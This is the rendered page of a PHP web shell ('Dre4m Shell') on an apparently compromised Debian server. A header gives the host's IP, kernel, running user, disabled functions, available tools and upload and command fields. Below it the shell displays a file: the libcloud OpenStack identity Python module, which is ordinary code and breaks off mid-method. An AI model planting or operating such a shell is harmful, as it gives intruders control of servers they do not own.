Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.148.117.167
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/3/cwd/proc/2/task/2/cwd/lib/python3/dist-packages/libcloud/common/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/3/cwd/proc/2/task/2/cwd/lib/python3/dist-packages/libcloud/common/openstack_identity.py
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements.  See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License.  You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""
Common / shared code for handling authentication against OpenStack identity
service (Keystone).
"""

from collections import namedtuple
import datetime

from libcloud.utils.py3 import httplib
from libcloud.utils.iso8601 import parse_date

from libcloud.common.base import (ConnectionUserAndKey, Response,
                                  CertificateConnection)
from libcloud.compute.types import (LibcloudError, InvalidCredsError,
                                    MalformedResponseError)

try:
    import simplejson as json
except ImportError:
    import json  # type: ignore

AUTH_API_VERSION = '1.1'
AUTH_TOKEN_HEADER = 'X-Auth-Token'

# Auth versions which contain token expiration information.
AUTH_VERSIONS_WITH_EXPIRES = [
    '1.1',
    '2.0',
    '2.0_apikey',
    '2.0_password',
    '2.0_voms',
    '3.0',
    '3.x_password',
    '3.x_appcred',
    '3.x_oidc_access_token'
]

# How many seconds to subtract from the auth token expiration time before
# testing if the token is still valid.
# The time is subtracted to account for the HTTP request latency and prevent
# user from getting "InvalidCredsError" if token is about to expire.
AUTH_TOKEN_EXPIRES_GRACE_SECONDS = 5


__all__ = [
    'OpenStackAuthenticationCache',
    'OpenStackAuthenticationCacheKey',
    'OpenStackAuthenticationContext',

    'OpenStackIdentityVersion',
    'OpenStackIdentityDomain',
    'OpenStackIdentityProject',
    'OpenStackIdentityUser',
    'OpenStackIdentityRole',

    'OpenStackServiceCatalog',
    'OpenStackServiceCatalogEntry',
    'OpenStackServiceCatalogEntryEndpoint',
    'OpenStackIdentityEndpointType',

    'OpenStackIdentityConnection',
    'OpenStackIdentity_1_0_Connection',
    'OpenStackIdentity_1_1_Connection',
    'OpenStackIdentity_2_0_Connection',
    'OpenStackIdentity_2_0_Connection_VOMS',
    'OpenStackIdentity_3_0_Connection',
    'OpenStackIdentity_3_0_Connection_AppCred',
    'OpenStackIdentity_3_0_Connection_OIDC_access_token',

    'get_class_for_auth_version'
]


class OpenStackAuthenticationCache:
    """
    Base class for external OpenStack authentication caches.

    Authentication tokens are always cached in memory in
    :class:`OpenStackIdentityConnection`.auth_token and related fields.  These
    tokens are lost when the driver is garbage collected.  To share tokens
    among multiple drivers, processes, or systems, use an
    :class:`OpenStackAuthenticationCache` in
    OpenStackIdentityConnection.auth_cache.

    Cache implementors should inherit this class and define the methods below.
    """
    def get(self, key):
        """
        Get an authentication context from the cache.

        :param key: Key to fetch.
        :type key: :class:`.OpenStackAuthenticationCacheKey`

        :return: The cached context for the given key, if present; None if not.
        :rtype: :class:`OpenStackAuthenticationContext`
        """
        raise NotImplementedError

    def put(self, key, context):
        """
        Put an authentication context into the cache.

        :param key: Key where the context will be stored.
        :type key: :class:`.OpenStackAuthenticationCacheKey`

        :param context: The context to cache.
        :type context: :class:`.OpenStackAuthenticationContext`
        """
        raise NotImplementedError

    def clear(self, key):
        """
        Clear an authentication context from the cache.

        :param key: Key to clear.
        :type key: :class:`.OpenStackAuthenticationCacheKey`
        """
        raise NotImplementedError


OpenStackAuthenticationCacheKey = namedtuple(
    'OpenStackAuthenticationCacheKey',
    ['auth_url', 'user_id', 'token_scope', 'tenant_name', 'domain_name',
     'tenant_domain_id'])


class OpenStackAuthenticationContext:
    """
    An authentication token and related context.
    """
    def __init__(self, token, expiration=None, user=None, roles=None,
                 urls=None):
        self.token = token
        self.expiration = expiration
        self.user = user
        self.roles = roles
        self.urls = urls


class OpenStackIdentityEndpointType(object):
    """
    Enum class for openstack identity endpoint type.
    """
    INTERNAL = 'internal'
    EXTERNAL = 'external'
    ADMIN = 'admin'


class OpenStackIdentityTokenScope(object):
    """
    Enum class for openstack identity token scope.
    """
    PROJECT = 'project'
    DOMAIN = 'domain'
    UNSCOPED = 'unscoped'


class OpenStackIdentityVersion(object):
    def __init__(self, version, status, updated, url):
        self.version = version
        self.status = status
        self.updated = updated
        self.url = url

    def __repr__(self):
        return (('<OpenStackIdentityVersion version=%s, status=%s, '
                 'updated=%s, url=%s>' %
                 (self.version, self.status, self.updated, self.url)))


class OpenStackIdentityDomain(object):
    def __init__(self, id, name, enabled):
        self.id = id
        self.name = name
        self.enabled = enabled

    def __repr__(self):
        return (('<OpenStackIdentityDomain id=%s, name=%s, enabled=%s>' %
                 (self.id, self.name, self.enabled)))


class OpenStackIdentityProject(object):
    def __init__(self, id, name, description, enabled, domain_id=None):
        self.id = id
        self.name = name
        self.description = description
        self.enabled = enabled
        self.domain_id = domain_id

    def __repr__(self):
        return (('<OpenStackIdentityProject id=%s, domain_id=%s, name=%s, '
                 'enabled=%s>' %
                 (self.id, self.domain_id, self.name, self.enabled)))


class OpenStackIdentityRole(object):
    def __init__(self, id, name, description, enabled):
        self.id = id
        self.name = name
        self.description = description
        self.enabled = enabled

    def __repr__(self):
        return (('<OpenStackIdentityRole id=%s, name=%s, description=%s, '
                 'enabled=%s>' % (self.id, self.name, self.description,
                                  self.enabled)))


class OpenStackIdentityUser(object):
    def __init__(self, id, domain_id, name, email, description, enabled):
        self.id = id
        self.domain_id = domain_id
        self.name = name
        self.email = email
        self.description = description
        self.enabled = enabled

    def __repr__(self):
        return (('<OpenStackIdentityUser id=%s, domain_id=%s, name=%s, '
                 'email=%s, enabled=%s>' % (self.id, self.domain_id, self.name,
                                            self.email, self.enabled)))


class OpenStackServiceCatalog(object):
    """
    http://docs.openstack.org/api/openstack-identity-service/2.0/content/

    This class should be instantiated with the contents of the
    'serviceCatalog' in the auth response. This will do the work of figuring
    out which services actually exist in the catalog as well as split them up
    by type, name, and region if available
    """

    _auth_version = None
    _service_catalog = None

    def __init__(self, service_catalog, auth_version=AUTH_API_VERSION):
        self._auth_version = auth_version

        # Check this way because there are a couple of different 2.0_*
        # auth types.
        if '3.x' in self._auth_version:
            entries = self._parse_service_catalog_auth_v3(
                service_catalog=service_catalog)
        elif '2.0' in self._auth_version:
            entries = self._parse_service_catalog_auth_v2(
                service_catalog=service_catalog)
        elif ('1.1' in self._auth_version) or ('1.0' in self._auth_version):
            entries = self._parse_service_catalog_auth_v1(
                service_catalog=service_catalog)
        else:
            raise LibcloudError('auth version "%s" not supported'
                                % (self._auth_version))

        # Force consistent ordering by sorting the entries
        entries = sorted(entries,
                         key=lambda x: x.service_type + (x.service_name or ''))
        self._entries = entries  # stories all the service catalog entries

    def get_entries(self):
        """
        Return all the entries for this service catalog.

        :rtype: ``list`` of :class:`.OpenStackServiceCatalogEntry`
        """
        return self._entries

    def get_catalog(self):
        """
        Deprecated in the favor of ``get_entries`` method.
        """
        return self.get_entries()

    def get_public_urls(self, service_type=None, name=None):
        """
        Retrieve all the available public (external) URLs for the provided
        service type and name.
        """
        endpoints = self.get_endpoints(service_type=service_type,
                                       name=name)

        result = []
        for endpoint in endpoints:
            endpoint_type = endpoint.endpoint_type
            if endpoint_type == OpenStackIdentityEndpointType.EXTERNAL:
                result.append(endpoint.url)

        return result

    def get_endpoints(self, service_type=None, name=None):
        """
        Retrieve all the endpoints for the provided service type and name.

        :rtype: ``list`` of :class:`.OpenStackServiceCatalogEntryEndpoint`
        """
        endpoints = []

        for entry in self._entries:
            # Note: "if XXX and YYY != XXX" comparison is used to support
            # partial lookups.
            # This allows user to pass in only one argument to the method (only
            # service_type or name), both of them or neither.
            if service_type and entry.service_type != service_type:
                continue

            if name and entry.service_name != name:
                continue

            for endpoint in entry.endpoints:
                endpoints.append(endpoint)

        return endpoints

    def get_endpoint(self, service_type=None, name=None, region=None,
                     endpoint_type=OpenStackIdentityEndpointType.EXTERNAL):
        """
        Retrieve a single endpoint using the provided criteria.

        Note: If no or more than one matching endpoint is found, an exception
        is thrown.
        """
        endpoints = []

        for entry in self._entries:
            if service_type and entry.service_type != service_type:
                continue

            if name and entry.service_name != name:
                continue

            for endpoint in entry.endpoints:
                if region and endpoint.region != region:
                    continue

                if endpoint_type and endpoint.endpoint_type != endpoint_type:
                    continue

                endpoints.append(endpoint)

        if len(endpoints) == 1:
            return endpoints[0]
        elif len(endpoints) > 1:
            raise ValueError('Found more than 1 matching endpoint')
        else:
            raise LibcloudError('Could not find specified endpoint')

    def get_regions(self, service_type=None):
        """
        Retrieve a list of all the available regions.

        :param service_type: If specified, only return regions for this
                             service type.
        :type service_type: ``str``

        :rtype: ``list`` of ``str``
        """
        regions = set()

        for entry in self._entries:
            if service_type and entry.service_type != service_type:
                continue

            for endpoint in entry.endpoints:
                if endpoint.region:
                    regions.add(endpoint.region)

        return sorted(list(regions))

    def get_service_types(self, region=None):
        """
        Retrieve all the available service types.

        :param region: Optional region to retrieve service types for.
        :type region: ``str``

        :rtype: ``list`` of ``str``
        """
        service_types = set()

        for entry in self._entries:
            include = True

            for endpoint in entry.endpoints:
                if region and endpoint.region != region:
                    include = False
                    break

            if include:
                service_types.add(entry.service_type)

        return sorted(list(service_types))

    def get_service_names(self, service_type=None, region=None):
        """
        Retrieve list of service names that match service type and region.

        :type service_type: ``str``
        :type region: ``str``

        :rtype: ``list`` of ``str``
        """
        names = set()

        if '2.0' not in self._auth_version:
            raise ValueError('Unsupported version: %s' % (self._auth_version))

        for entry in self._entries:
            if service_type and entry.service_type != service_type:
                continue

            include = True
            for endpoint in entry.endpoints:
                if region and endpoint.region != region:
                    include = False
                    break

            if include and entry.service_name:
                names.add(entry.service_name)

        return sorted(list(names))

    def _parse_service_catalog_auth_v1(self, service_catalog):
        entries = []

        for service, endpoints in service_catalog.items():
            entry_endpoints = []
            for endpoint in endpoints:
                region = endpoint.get('region', None)

                public_url = endpoint.get('publicURL', None)
                private_url = endpoint.get('internalURL', None)

                if public_url:
                    entry_endpoint = OpenStackServiceCatalogEntryEndpoint(
                        region=region, url=public_url,
                        endpoint_type=OpenStackIdentityEndpointType.EXTERNAL)
                    entry_endpoints.append(entry_endpoint)

                if private_url:
                    entry_endpoint = OpenStackServiceCatalogEntryEndpoint(
                        region=region, url=private_url,
                        endpoint_type=OpenStackIdentityEndpointType.INTERNAL)
                    entry_endpoints.append(entry_endpoint)

            entry = OpenStackServiceCatalogEntry(service_type=service,
                                                 endpoints=entry_endpoints)
            entries.append(entry)

        return entries

    def _parse_service_catalog_auth_v2(self, service_catalog):
        entries = []

        for service in service_catalog:
            service_type = service['type']
            service_name = service.get('name', None)

            entry_endpoints = []
            for endpoint in service.get('endpoints', []):
                region = endpoint.get('region', None)

                public_url = endpoint.get('publicURL', None)
                private_url = endpoint.get('internalURL', None)

                if public_url:
                    entry_endpoint = OpenStackServiceCatalogEntryEndpoint(
                        region=region, url=public_url,
                        endpoint_type=OpenStackIdentityEndpointType.EXTERNAL)
                    entry_endpoints.append(entry_endpoint)

                if private_url:
                    entry_endpoint = OpenStackServiceCatalogEntryEndpoint(
                        region=region, url=private_url,
                        endpoint_type=OpenStackIdentityEndpointType.INTERNAL)
                    entry_endpoints.append(entry_endpoint)

            entry = OpenStackServiceCatalogEntry(service_type=service_type,
                                                 endpoints=entry_endpoints,
                                                 service_name=service_name)
            entries.append(entry)

        return entries

    def _parse_service_catalog_auth_v3(self, service_catalog):
        entries = []

        for item in service_catalog:
            service_type = item['type']
            service_name = item.get('name', None)

            entry_endpoints = []
            for endpoint in item['endpoints']:
                region = endpoint.get('region', None)
                url = endpoint['url']
                endpoint_type = endpoint['interface']

                if endpoint_type == 'internal':
                    endpoint_type = OpenStackIdentityEndpointType.INTERNAL
                elif endpoint_type == 'public':
                    endpoint_type = OpenStackIdentityEndpointType.EXTERNAL
                elif endpoint_type == 'admin':
                    endpoint_type = OpenStackIdentityEndpointType.ADMIN

                entry_endpoint = OpenStackServiceCatalogEntryEndpoint(
                    region=region, url=url, endpoint_type=endpoint_type)
                entry_endpoints.append(entry_endpoint)

            entry = OpenStackServiceCatalogEntry(service_type=service_type,
                                                 service_name=service_name,
                                                 endpoints=entry_endpoints)
            entries.append(entry)

        return entries


class OpenStackServiceCatalogEntry(object):
    def __init__(self, service_type, endpoints=None, service_name=None):
        """
        :param service_type: Service type.
        :type service_type: ``str``

        :param endpoints: Endpoints belonging to this entry.
        :type endpoints: ``list``

        :param service_name: Optional service name.
        :type service_name: ``str``
        """
        self.service_type = service_type
        self.endpoints = endpoints or []
        self.service_name = service_name

        # For consistency, sort the endpoints
        self.endpoints = sorted(self.endpoints, key=lambda x: x.url or '')

    def __eq__(self, other):
        return (self.service_type == other.service_type and
                self.endpoints == other.endpoints and
                other.service_name == self.service_name)

    def __ne__(self, other):
        return not self.__eq__(other=other)

    def __repr__(self):
        return (('<OpenStackServiceCatalogEntry service_type=%s, '
                 'service_name=%s, endpoints=%s' %
                 (self.service_type, self.service_name, repr(self.endpoints))))


class OpenStackServiceCatalogEntryEndpoint(object):
    VALID_ENDPOINT_TYPES = [
        OpenStackIdentityEndpointType.INTERNAL,
        OpenStackIdentityEndpointType.EXTERNAL,
        OpenStackIdentityEndpointType.ADMIN,
    ]

    def __init__(self, region, url, endpoint_type='external'):
        """
        :param region: Endpoint region.
        :type region: ``str``

        :param url: Endpoint URL.
        :type url: ``str``

        :param endpoint_type: Endpoint type (external / internal / admin).
        :type endpoint_type: ``str``
        """
        if endpoint_type not in self.VALID_ENDPOINT_TYPES:
            raise ValueError('Invalid type: %s' % (endpoint_type))

        # TODO: Normalize / lowercase all the region names
        self.region = region
        self.url = url
        self.endpoint_type = endpoint_type

    def __eq__(self, other):
        return (self.region == other.region and self.url == other.url and
                self.endpoint_type == other.endpoint_type)

    def __ne__(self, other):
        return not self.__eq__(other=other)

    def __repr__(self):
        return (('<OpenStackServiceCatalogEntryEndpoint region=%s, url=%s, '
                 'type=%s' % (self.region, self.url, self.endpoint_type)))


class OpenStackAuthResponse(Response):
    def success(self):
        return self.status in [httplib.OK, httplib.CREATED,
                               httplib.ACCEPTED, httplib.NO_CONTENT,
                               httplib.MULTIPLE_CHOICES,
                               httplib.UNAUTHORIZED,
                               httplib.INTERNAL_SERVER_ERROR]

    def parse_body(self):
        if not self.body:
            return None

        if 'content-type' in self.headers:
            key = 'content-type'
        elif 'Content-Type' in self.headers:
            key = 'Content-Type'
        else:
            raise LibcloudError('Missing content-type header',
                                driver=OpenStackIdentityConnection)

        content_type = self.headers[key]
        if content_type.find(';') != -1:
            content_type = content_type.split(';')[0]

        if content_type == 'application/json':
            try:
                data = json.loads(self.body)
            except Exception:
                driver = OpenStackIdentityConnection
                raise MalformedResponseError('Failed to parse JSON',
                                             body=self.body,
                                             driver=driver)
        elif content_type == 'text/plain':
            data = self.body
        else:
            data = self.body

        return data


class OpenStackIdentityConnection(ConnectionUserAndKey):
    """
    Base identity connection class which contains common / shared logic.

    Note: This class shouldn't be instantiated directly.
    """
    responseCls = OpenStackAuthResponse
    timeout = None
    auth_version = None  # type: str

    def __init__(self, auth_url, user_id, key, tenant_name=None,
                 tenant_domain_id='default', domain_name='Default',
                 token_scope=OpenStackIdentityTokenScope.PROJECT,
                 timeout=None, proxy_url=None, parent_conn=None,
                 auth_cache=None):
        super(OpenStackIdentityConnection, self).__init__(user_id=user_id,
                                                          key=key,
                                                          url=auth_url,
                                                          timeout=timeout,
                                                          proxy_url=proxy_url)

        self.parent_conn = parent_conn

        # enable tests to use the same mock connection classes.
        if parent_conn:
            self.conn_class = parent_conn.conn_class
            self.driver = parent_conn.driver
        else:
            self.driver = None

        self.auth_url = auth_url
        self.tenant_name = tenant_name
        self.domain_name = domain_name
        self.tenant_domain_id = tenant_domain_id
        self.token_scope = token_scope
        self.timeout = timeout
        self.auth_cache = auth_cache

        self.urls = {}
        self.auth_token = None
        self.auth_token_expires = None
        self.auth_user_info = None
        self.auth_user_roles = None

    def authenticated_request(self, action, params=None, data=None,
                              headers=None, method='GET', raw=False):
        """
        Perform an authenticated request against the identity API.
        """
        if not self.auth_token:
            raise ValueError(
                'Need to be authenticated to perform this request')

        headers = headers or {}
        headers[AUTH_TOKEN_HEADER] = self.auth_token

        response = self.request(action=action, params=params, data=data,
                                headers=headers, method=method, raw=raw)
        # Evict cached auth token if we receive Unauthorized while using it
        if response.status == httplib.UNAUTHORIZED:
            self.clear_cached_auth_context()
        return response

    def morph_action_hook(self, action):
        (_, _, _, request_path) = self._tuple_from_url(self.auth_url)

        if request_path == '':
            # No path is provided in the auth_url, use action passed to this
            # method.
            return action

        return request_path

    def add_default_headers(self, headers):
        headers['Accept'] = 'application/json'
        headers['Content-Type'] = 'application/json; charset=UTF-8'
        return headers

    def is_token_valid(self):
        """
        Return True if the current auth token is already cached and hasn't
        expired yet.

        :return: ``True`` if the token is still valid, ``False`` otherwise.
        :rtype: ``bool``
        """
        if not self.auth_token:
            return False

        if not self.auth_token_expires:
            return False

        expires = self.auth_token_expires - \
            datetime.timedelta(seconds=AUTH_TOKEN_EXPIRES_GRACE_SECONDS)

        time_tuple_expires = expires.utctimetuple()
        time_tuple_now = datetime.datetime.utcnow().utctimetuple()

        if time_tuple_now < time_tuple_expires:
            return True

        return False

    def authenticate(self, force=False):
        """
        Authenticate against the identity API.

        :param force: Forcefully update the token even if it's already cached
                      and still valid.
        :type force: ``bool``
        """
        raise NotImplementedError('authenticate not implemented')

    def clear_cached_auth_context(self):
        """
        Clear the cached authentication context.

        The context is cleared from fields on this connection and from the
        external cache, if one is configured.
        """
        self.auth_token = None
        self.auth_token_expires = None
        self.auth_user_info = None
        self.auth_user_roles = None
        self.urls = {}

        if self.auth_cache is not None:
            self.auth_cache.clear(self._cache_key)

    def list_supported_versions(self):
        """
        Retrieve a list of all the identity versions which are supported by
        this installation.

        :rtype: ``list`` of :class:`.OpenStackIdentityVersion`
        """
        response = self.request('/', method='GET')
        result = self._to_versions(data=response.object['versions']['values'])
        result = sorted(result, key=lambda x: x.version)
        return result

    def _to_versions(self, data):
        result = []
        for item in data:
            version = self._to_version(data=item)
            result.append(version)

        return result

    def _to_version(self, data):
        try:
            updated = parse_date(data['updated'])
        except Exception:
            updated = None

        try:
            url = data['links'][0]['href']
        except IndexError:
            url = None

        version = OpenStackIdentityVersion(version=data['id'],
                                           status=data['status'],
                                           updated=updated,
                                           url=url)
        return version

    def _is_authentication_needed(self, force=False):
        """
        Determine if the authentication is needed or if the existing token (if
        any exists) is still valid.
        """
        if force:
            return True

        if self.auth_version not in AUTH_VERSIONS_WITH_EXPIRES:
            return True

        if self.is_token_valid():
            return False

        # See if there's a new token in the cache
        self._load_auth_context_from_cache()

        # If there was a token in the cache, it is now stored in our local
        # auth_token and related fields.  Ensure it is still valid.
        if self.is_token_valid():
            return False

        return True

    def _to_projects(self, data):
        result = []
        for item in data:
            project = self._to_project(data=item)
            result.append(project)

        return result

    def _to_project(self, data):
        project = OpenStackIdentityProject(id=data['id'],
                                           name=data['name'],
                                           description=data['description'],
                                           enabled=data['enabled'],
                                           domain_id=data.get('domain_id',
                                                              None))
        return project

    @property
    def _cache_key(self):
        """
        The key where this connection's authentication context will be cached.

        :rtype: :class:`OpenStackAuthenticationCacheKey`
        """
        return OpenStackAuthenticationCacheKey(
            self.auth_url, self.user_id, self.token_scope, self.tenant_name,
            self.domain_name, self.tenant_domain_id)

    def _cache_auth_context(self, context):
        """
        Store an authentication context in memory and the cache.

        :param context: Authentication context to cache.
        :type key: :class:`.OpenStackAuthenticationContext`
        """
        self.urls = context.urls
        self.auth_token = context.token
        self.auth_token_expires = context.expiration
        self.auth_user_info = context.user
        self.auth_user_roles = context.roles

        if self.auth_cache is not None:
            self.auth_cache.put(self._cache_key, context)

    def _load_auth_context_from_cache(self):
        """
        Fetch an authentication context for this connection from the cache.

        :rtype: :class:`OpenStackAuthenticationContext`
        """
        if self.auth_cache is None:
            return None

        context = self.auth_cache.get(self._cache_key)
        if context is None:
            return None

        self.urls = context.urls
        self.auth_token = context.token
        self.auth_token_expires = context.expiration
        self.auth_user_info = context.user
        self.auth_user_roles = context.roles
        return context


class OpenStackIdentity_1_0_Connection(OpenStackIdentityConnection):
    """
    Connection class for Keystone API v1.0.
    """

    responseCls = OpenStackAuthResponse
    name = 'OpenStack Identity API v1.0'
    auth_version = '1.0'

    def authenticate(self, force=False):
        if not self._is_authentication_needed(force=force):
            return self

        headers = {
            'X-Auth-User': self.user_id,
            'X-Auth-Key': self.key,
        }

        resp = self.request('/v1.0', headers=headers, method='GET')

        if resp.status == httplib.UNAUTHORIZED:
            # HTTP UNAUTHORIZED (401): auth failed
            raise InvalidCredsError()
        elif resp.status not in [httplib.NO_CONTENT, httplib.OK]:
            body = 'code: %s body:%s headers:%s' % (resp.status,
                                                    resp.body,
                                                    resp.headers)
            raise MalformedResponseError('Malformed response', body=body,
                                         driver=self.driver)
        else:
            headers = resp.headers
            # emulate the auth 1.1 URL list
            self.urls = {}
            self.urls['cloudServers'] = \
                [{'publicURL': headers.get('x-server-management-url', None)}]
            self.urls['cloudFilesCDN'] = \
                [{'publicURL': headers.get('x-cdn-management-url', None)}]
            self.urls['cloudFiles'] = \
                [{'publicURL': headers.get('x-storage-url', None)}]
            self.auth_token = headers.get('x-auth-token', None)
            self.auth_user_info = None

            if not self.auth_token:
                raise MalformedResponseError('Missing X-Auth-Token in'
                                             ' response headers')

        return self


class OpenStackIdentity_1_1_Connection(OpenStackIdentityConnection):
    """
    Connection class for Keystone API v1.1.
    """

    responseCls = OpenStackAuthResponse
    name = 'OpenStack Identity API v1.1'
    auth_version = '1.1'

    def authenticate(self, force=False):
        if not self._is_authentication_needed(force=force):
            return self

        reqbody = json.dumps({'credentials': {'username': self.user_id,
                                              'key': self.key}})
        resp = self.request('/v1.1/auth', data=reqbody, headers={},
                            method='POST')

        if resp.status == httplib.UNAUTHORIZED:
            # HTTP UNAUTHORIZED (401): auth failed
            raise InvalidCredsError()
        elif resp.status != httplib.OK:
            body = 'code: %s body:%s' % (resp.status, resp.body)
            raise MalformedResponseError('Malformed response', body=body,
                                         driver=self.driver)
        else:
            try:
                body = json.loads(resp.body)
            except Exception as e:
                raise MalformedResponseError('Failed to parse JSON', e)

            try:
                expires = body['auth']['token']['expires']
                self._cache_auth_context(
                    OpenStackAuthenticationContext(
                        body['auth']['token']['id'],
                        expiration=parse_date(expires),
                        urls=body['auth']['serviceCatalog']))
            except KeyError as e:
                raise MalformedResponseError('Auth JSON response is \
                                             missing required elements', e)

        return self


class OpenStackIdentity_2_0_Connection(OpenStackIdentityConnection):
    """
    Connection class for Keystone API v2.0.
    """

    responseCls = OpenStackAuthResponse
    name = 'OpenStack Identity API v1.0'
    auth_version = '2.0'

    def authenticate(self, auth_type='api_key', force=False):
        if not self._is_authentication_needed(force=force):
            return self

        if auth_type == 'api_key':
            return self._authenticate_2_0_with_api_key()
        elif auth_type == 'password':
            return self._authenticate_2_0_with_password()
        else:
            raise ValueError('Invalid value for auth_type argument')

    def _authenticate_2_0_with_api_key(self):
        # API Key based authentication uses the RAX-KSKEY extension.
        # http://s.apache.org/oAi
        data = {'auth':
                {'RAX-KSKEY:apiKeyCredentials':
                 {'username': self.user_id, 'apiKey': self.key}}}
        if self.tenant_name:
            data['auth']['tenantName'] = self.tenant_name
        reqbody = json.dumps(data)
        return self._authenticate_2_0_with_body(reqbody)

    def _authenticate_2_0_with_password(self):
        # Password based authentication is the only 'core' authentication
        # method in Keystone at this time.
        # 'keystone' - http://s.apache.org/e8h
        data = {'auth':
                {'passwordCredentials':
                 {'username': self.user_id, 'password': self.key}}}
        if self.tenant_name:
            data['auth']['tenantName'] = self.tenant_name
        reqbody = json.dumps(data)
        return self._authenticate_2_0_with_body(reqbody)

    def _authenticate_2_0_with_body(self, reqbody):
        resp = self.request('/v2.0/tokens', data=reqbody,
                            headers={'Content-Type': 'application/json'},
                            method='POST')

        if resp.status == httplib.UNAUTHORIZED:
            raise InvalidCredsError()
        elif resp.status not in [httplib.OK,
                                 httplib.NON_AUTHORITATIVE_INFORMATION]:
            body = 'code: %s body: %s' % (resp.status, resp.body)
            raise MalformedResponseError('Malformed response', body=body,
                                         driver=self.driver)
        else:
            body = resp.object

            try:
                access = body['access']
                expires = access['token']['expires']
                self._cache_auth_context(
                    OpenStackAuthenticationContext(
                        access['token']['id'],
                        expiration=parse_date(expires),
                        urls=access['serviceCatalog'],
                        user=access.get('user', {})))
            except KeyError as e:
                raise MalformedResponseError('Auth JSON response is \
                                             missing required elements', e)

        return self

    def list_projects(self):
        response = self.authenticated_request('/v2.0/tenants', method='GET')
        result = self._to_projects(data=response.object['tenants'])
        return result

    def list_tenants(self):
        return self.list_projects()


class OpenStackIdentity_3_0_Connection(OpenStackIdentityConnection):
    """
    Connection class for Keystone API v3.x.
    """

    responseCls = OpenStackAuthResponse
    name = 'OpenStack Identity API v3.x'
    auth_version = '3.0'

    VALID_TOKEN_SCOPES = [
        OpenStackIdentityTokenScope.PROJECT,
        OpenStackIdentityTokenScope.DOMAIN,
        OpenStackIdentityTokenScope.UNSCOPED
    ]

    def __init__(self, auth_url, user_id, key, tenant_name=None,
                 domain_name='Default', tenant_domain_id='default',
                 token_scope=OpenStackIdentityTokenScope.PROJECT,
                 timeout=None, proxy_url=None, parent_conn=None,
                 auth_cache=None):
        """
        :param tenant_name: Name of the project this user belongs to. Note:
                            When token_scope is set to project, this argument
                            control to which project to scope the token to.
        :type tenant_name: ``str``

        :param domain_name: Domain the user belongs to. Note: When token_scope
                            is set to token, this argument controls to which
                            domain to scope the token to.
        :type domain_name: ``str``

        :param token_scope: Whether to scope a token to a "project", a
                            "domain" or "unscoped"
        :type token_scope: ``str``

        :param auth_cache: Where to cache authentication tokens.
        :type auth_cache: :class:`OpenStackAuthenticationCache`
        """
        super(OpenStackIdentity_3_0_Connection,
              self).__init__(auth_url=auth_url,
                             user_id=user_id,
                             key=key,
                             tenant_name=tenant_name,
                             domain_name=domain_name,
                             tenant_domain_id=tenant_domain_id,
                             token_scope=token_scope,
                             timeout=timeout,
                             proxy_url=proxy_url,
                             parent_conn=parent_conn,
                             auth_cache=auth_cache)

        if self.token_scope not in self.VALID_TOKEN_SCOPES:
            raise ValueError('Invalid value for "token_scope" argument: %s' %
                             (self.token_scope))

        if (self.token_scope == OpenStackIdentityTokenScope.PROJECT and
                (not self.tenant_name or not self.domain_name)):
            raise ValueError('Must provide tenant_name and domain_name '
                             'argument')
        elif (self.token_scope == OpenStackIdentityTokenScope.DOMAIN and
                not self.domain_name):
            raise ValueError('Must provide domain_name argument')

    def authenticate(self, force=False):
        """
        Perform authentication.
        """
        if not self._is_authentication_needed(force=force):
            return self

        data = self._get_auth_data()
        data = json.dumps(data)
        response = self.request('/v3/auth/tokens', data=data,
                                headers={'Content-Type': 'application/json'},
                                method='POST')
        self._parse_token_response(response, cache_it=True)
        return self

    def list_domains(self):
        """
        List the available domains.

        :rtype: ``list`` of :class:`OpenStackIdentityDomain`
        """
        response = self.authenticated_request('/v3/domains', method='GET')
        result = self._to_domains(data=response.object['domains'])
        return result

    def list_projects(self):
        """
        List the available projects.

        Note: To perform this action, user you are currently authenticated with
        needs to be an admin.

        :rtype: ``list`` of :class:`OpenStackIdentityProject`
        """
        response = self.authenticated_request('/v3/projects', method='GET')
        result = self._to_projects(data=response.object['projects'])
        return result

    def list_users(self):
        """
        List the available users.

        :rtype: ``list`` of :class:`.OpenStackIdentityUser`
        """
        response = self.authenticated_request('/v3/users', method='GET')
        result = self._to_users(data=response.object['users'])
        return result

    def list_roles(self):
        """
        List the available roles.

        :rtype: ``list`` of :class:`.OpenStackIdentityRole`
        """
        response = self.authenticated_request('/v3/roles', method='GET')
        result = self._to_roles(data=response.object['roles'])
        return result

    def get_domain(self, domain_id):
        """
        Retrieve information about a single domain.

        :param domain_id: ID of domain to retrieve information for.
        :type domain_id: ``str``

        :rtype: :class:`.OpenStackIdentityDomain`
        """
        response = self.authenticated_request('/v3/domains/%s' % (domain_id),
                                              method='GET')
        result = self._to_domain(data=response.object['domain'])
        return result

    def get_user(self, user_id):
        """
        Get a user account by ID.

        :param user_id: User's id.
        :type name: ``str``

        :return: Located user.
        :rtype: :class:`.OpenStackIdentityUser`
        """
        response = self.authenticated_request('/v3/users/%s' % user_id)
        user = self._to_user(data=response.object['user'])
        return user

    def list_user_projects(self, user):
        """
        Retrieve all the projects user belongs to.

        :rtype: ``list`` of :class:`.OpenStackIdentityProject`
        """
        path = '/v3/users/%s/projects' % (user.id)
